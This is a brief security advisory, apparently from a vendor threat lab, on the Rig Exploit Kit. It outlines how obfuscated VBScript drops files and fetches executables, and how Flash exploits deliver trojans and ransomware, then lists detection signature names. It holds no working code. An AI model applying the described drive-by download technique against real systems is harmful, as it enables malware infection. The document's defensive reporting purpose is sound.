Rig Exploit Kit remains active delivering malicious payloads
May 17, 2018
Rig EK landing page delivers gzipped page as HTTP response.
VBScript code is obfuscated by base64 encoding
Base64 decoded VBScript below, it creates a shell32.dll in the %Temp% directory, fake the system path, perform http requests on a url and create a [random].exe out of HTTP response.
Also Rig EK brings down flash payloads to exploit zero day flash vulnerabilities. After successfully exploiting the system, it brings down more malicious payloads from Trojans to Ransomwares.
SonicWall Threat Research Lab is still seeing the activity of Rig Exploit kit.
This can be mitigated by using the latest non-vulnerable version of the software.
Sonicwall Capture Threat Lab has created the below signatures to stop Rig EK before it drops payloads.
- SPY Obfuscated-File vbs
- SPY Obfuscated-File js
- IPS Suspicious Rig EK